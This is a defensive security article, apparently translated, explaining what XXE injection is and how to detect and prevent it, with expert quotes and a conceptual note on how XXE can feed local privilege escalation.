XXE injections: Detection and prevention

[Father]

Today, XML is one of the most widely used languages in the world for storing and transporting data. XXE is an injection of external XML entities. Using this vulnerability, cybercriminals can get into the processing of XML data by the application. If the attack is successful, the attackers will be able to see the files in the application server system and perform actions with the server systems. In addition, external applications and systems that can be accessed by the server will also get access to the criminal.

By performing such an injection, a criminal can not only steal sensitive data, but also use it to fake server-side requests (SSRF). This is a very dangerous vulnerability, because by exploiting it, attackers can use a server program to execute HTTP requests to any URL that the server has access to.

In this article, we will explain how to detect and prevent XXE injections, as well as an attack using LPE and XXE.

Methods for detecting XXE injections​

One of the most important aspects of penetration testing is the detection of XML Entity (XXE) vulnerabilities. XXE-vulnerability occurs when an application processes or parses external XML entities in an insecure manner. This can be dangerous, as it leads to various attacks in the future, including reading local files or executing remote code.

Alexander Zubrikov
General Director ITGLOBAL.COM Security

To detect XXE vulnerabilities in web applications, you need to pay close attention to the endpoints that process XML data entered by the user. Crawlers or specialists inject specially generated XML injections, such as files, URLs, or external schemas, to check how the application processes such data.

To find vulnerabilities, you can use full-fledged vulnerability scanners, such as OWASP ZAP, BurpSuit, Nessus, Acunetix, and so on. You can also use highly specialized utilities, such as XXExploiter.

To detect external XML entities, you can use the following solutions:

1. WAF (Web Application Firewall). Modern WAFs can be configured specifically to detect XXE attacks. WAF is able to filter incoming and outgoing traffic, catching anomalies that may indicate an attack attempt via XML External Entities.
2. DAST (Dynamic Application Analysis). These tools can monitor the application's behavior in real time, allowing you to detect XXE and other vulnerabilities.
3. Automatic Web Crawlers. These programs can also be configured to automatically detect XXE.
4. Fuzzing method. It consists of feeding various input data (including manipulated XML documents) to identify vulnerabilities.
5. You can also use tools for static code analysis. They scan the source code for XXE-related vulnerabilities.
6. IDS/IPS tools. Intrusion detection and prevention systems can be configured to detect attempts to exploit XXE vulnerabilities at the network level.

Konstantin Tyutyunnik
Head of the company IT For Prof

In one of our projects, we used a combination of WAF and monitoring systems to detect XXE. As soon as the WAF noticed a suspicious XML request, the monitoring system immediately sent a notification to the administrator, which allowed for quick action. Each of the methods for detecting external XML entities has its own pros and cons, and their effectiveness largely depends on the specific environment and use case. For this reason, I recommend combining various methods to best detect XXE vulnerabilities.

You can also use monitoring to detect external XML entities. Configured logging and monitoring systems can help you quickly detect unusual requests or abnormal behavior, which can be a sign of an XXE attack.

Preventing XXE injections​

One of the most important issues in terms of ensuring information security of an organization's IT infrastructure is the exclusion of XXE vulnerabilities from the code and infrastructure. The simplest and most effective way is to disable external entities. In other words, disabling processing of external XML entities in the XML parser settings.

Sergey Polunin
Head of the Infrastructure IT Protection Group at Gazinformservis

Typically, preventing an XXE injection attack consists of eliminating its causes – errors in the application's code or logic. However, in addition to this, it is useful to use application-level firewalls, which can use signatures or AI to detect and block such attacks, even if errors in the code allow them to be carried out.

Methods for preventing XXE injections:

1. Validation of input data.
2. Whitelist. If you need to support XML processing, then you need to create a "white list" of valid entities that the parser is limited to.
3. Timely updates and application of patches. Keep an eye out for updates to your XML parser and other system components that may be vulnerable to XXE attacks.
4. Restriction of access rights to the system.
5. Disable DTDs and external schemas if they are not required for the application to work.
6. WAF (Web Application Firewall). The tool must be configured to filter incoming requests and block XXE injections.

Experts also recommend avoiding using unnecessary XML parsing functions. So, it is better to disable functions that process external entities when they are not needed for the application to work.

Konstantin Tyutyunnik
Head of the company IT For Prof

The use of several XXE prevention methods, together with regular monitoring, security policies, regulations, and employee awareness-raising, significantly increases the level of protection against XXE vulnerabilities. Do not run the app under a privileged root user and always store 2-3 backups on different storage locations. Use a version control system like Git. Remember, security is not a one-time event, it's a process.

In addition, to prevent XXE injections, do not forget about monitoring and auditing systems that will help you quickly detect and respond to suspicious actions. Backups of important data and systems are also important so that in the event of an attack, you can restore your work.

And of course, do not forget about the human factor-improving the information security skills of developers and administrators, as well as training other employees of the company in cyber hygiene.

Local Privilege Escalation​

LPE (Local Privilege Escalation), or local privilege escalation, is usually not implemented directly with XXE. Local Privilege Escalation (LPE) and XML External Entities (XXE) are two different threats, but they can sometimes overlap in the same attack. Some languages, such as PHP, may allow remote code execution using XXE. For most languages, such as JAVA, it only allows you to read files.

Evgeny Gryaznov
Product Manager, R-Vison Threat Deception Platform (R-Vision TDP)

For local privilege escalation, you need, for example, to find usernames/passwords or other data on the file system that allows you to increase these privileges. The most common mistake is storing credentials, for example, for a DBMS, in clear text in the application configuration, which allows you to get this data via XXE and then connect directly to the DBMS. Or find the keys for the SSH connection and use them.

Privilege escalation can occur only after minimal access to the system has been obtained, and an attacker tries to take control of access at the administrator level. Most often, the main attack vectors are configuration errors, lack of security updates, and the presence of vulnerable software. There are special tools that allow a cybercriminal to see errors in the system.

Alexander Zubrikov
General Director ITGLOBAL.COM Security

The implementation of the LPE during XXE operation may vary depending on the context and specific configuration of the target system. However, there are several common ways to reach LPE: An attacker can gain the ability to read local files that can contain administrator or other user credentials. If XXE is exploited on a server, its faulty XML processing may cause a buffer overflow or exploit other vulnerabilities in system calls. This can enable a Remote Code Execution (RCE) attack and result in privileged code execution.

To protect against such privilege escalation methods, experts recommend updating the software and operating system, as well as minimizing the use of accounts with administrative privileges. In addition, you need to configure access rights, security policies, and use SRP or AppLocker, as well as conduct regular security audits.

Conclusions​

When it comes to preventing XXE injections, standard security measures that are updated and completed in time play an important role, and they are often ignored or forgotten to be put in order in time. So, timely software and security updates can protect the company's IT infrastructure.

It is equally important to restrict the rights of administrators and disable processing of external XML entities. Therefore, configuring XML parsers to disable support for external entities is one of the key points of protection.

To protect against LPE vulnerabilities, it is important to minimize the rights of each user and service, as well as regularly update the software and OS. Although XXE and LPE have different attack vectors, proper setup and configuration can significantly reduce risks in both categories.